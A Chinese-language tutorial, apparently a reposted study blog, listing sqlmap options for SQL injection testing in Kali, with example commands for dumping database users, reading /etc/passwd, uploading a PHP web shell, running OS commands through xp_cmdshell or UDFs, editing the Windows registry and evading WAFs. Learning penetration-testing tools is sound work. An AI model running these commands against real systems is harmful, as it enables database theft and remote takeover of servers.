小白日記46:kali滲透測試之Web滲透-SqlMap自動注入(四)-sqlmap參數詳解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

來源:互聯網
上載者:User

標籤:帳號   選擇   inf   param   stop   sys   details   force   php   

sqlmap自動注入

Enumeration【資料枚舉】

 

--privileges -U username【CU 當前帳號】

-D dvwa -T users -C user --columns   【指定資料庫,表,列】

--exclude-sysdbs  【排除系統層的庫】

*******************************************************************************

 

#查具體資料  【前提:當前資料庫使用者有權讀取information_schema庫】

--schema --batch --exclude-sysdbs  中繼資料【--batch:批處理,使用預設選項,直接出結果】
--count  【計數】
Dump資料
--dump, -C, -T, -D, --start, --stop
--dump-all --exclude-sysdbs

--sql-query "select * from users"  【前提:已查詢得知資料庫的表和列;自訂SQL查詢語句】

******************************************************************************

 

Brute force【當無許可權訪問information_schema,使用暴力破解

 

須知

1、Mysql < 5.0 , 沒有 information_schema 庫
2、Mysql >= 5.0 但無權讀取information_schema 庫

3、使用的是微軟的access資料庫,預設無權讀取MSysObjects

 --common-columns  (Acess系統資料表無列資訊)  【若不指定列,預設為當前列】

 

UDF injection【自訂參數注入,屬於進階注入】

編譯共用庫建立並上傳至DB Sever,以此產生UDF實現進階注入

上傳檔案格式:Linux:shared object  Windows:DLL

 

File system【檔案系統的訪問】

--file-read="/etc/passwd"
--file-write="shell.php" --file-dest "/tmp/shell.php"   【注入檔案必須存放在目前的目錄;上傳存放的目標目錄】

#預設儲存在:.sqlmap/output

 

 OS  【作業系統的訪問】

LINUX系統:Mysql、postgresql

上傳共用庫並產生sys_exec()、sys_eval()兩個UDF

Windows系統:Mssql

利用xp_cmdshel預存程序(有就用,禁就啟,沒就建)

--sql-shell  【SQL的shell】

 

 Windows Registry  【windows系統註冊表  前提:目前使用者有許可權對註冊表進行操作】

--reg-read

--reg-add

--reg-del

--reg-key、--reg-value、--reg-data、--reg-type

例如:sqlmap –u="http://1.1.1.1/a.aspx?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

 

General  【一般性函數】

 

-s:修改sqlite會話檔案儲存位置

預設:.sqlmap/output

-t:修改記錄流量檔案儲存位置

預設:.sqlmap/output

--charset:強制字元編碼

--charset=GBK

--crawl:指定從起始位置耙梳深度

--batch --crawl=3

--csv-del:指定其他分割符  【dump資料 預設存於” ,”分割的CSV檔案】

--csv-del=";"

--dbms-cred:指定資料庫帳號【前提:有資料庫管理系統的帳號密碼】

#查過的資料都儲存在Session中

--flush-session:清空Session  【當我們重新查詢相同網站的查詢,其查詢內容為前一次儲存的Session資料】

--force-ssl:針對https網站進行查詢

--fresh-queries:忽略Session查詢結果

--hex:以十六進位(原資料)形式dump非ASCII字元內容,收到後解碼還原,只是作用於通道

sqlmap -u "http://<ip>/s.php?id=1" --hex -v 3

--output-dir=/tmp  【指定輸出資料的目錄】

--parse-errors: 分析和現實資料庫內建報錯資訊,來判斷漏洞

sqlmap.py -u "http://<id>/sqlmap/a.asp?id=" --parse-errors

 --save:將命令儲存成設定檔,指定儲存位置 【】

 

Miscellaneous 【雜項】

-z:參數助記符  【可簡寫,參數寫成參數集合】

如:sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u "1.1.1.1/a.asp?id=1"

sqlmap -z "bat,random,ign,tec=BEU" -u "1.1.1.1/a.asp?id=1"

--answer:設定不同的問題的參數【類似--batch】

sqlmap -u "http://<ip>/a.php?id=1" --technique=E --anser="extending=N" --batch

--check-waf:檢測WAF/IPS/IDS

--hpp:HTTP parameter pollution  【本質,WEB上的一個漏洞】

繞過WAF/IPS/IDS的有效方法

尤其對ASP/IIS和ASP.NET/IIS

--identity-waf:徹底的waf/ips/ids檢查  【因為有些WAF只過濾第一次出現的username】

支援30多種產品

*************************************************************************

--mobile:類比智能手機裝置

--purge-output:清除output檔案夾

--smart:當有大量檢測目標時,只選擇基於錯誤的檢測結果

 --wizard:嚮導

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

小白日記46:kali滲透測試之Web滲透-SqlMap自動注入(四)-sqlmap參數詳解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.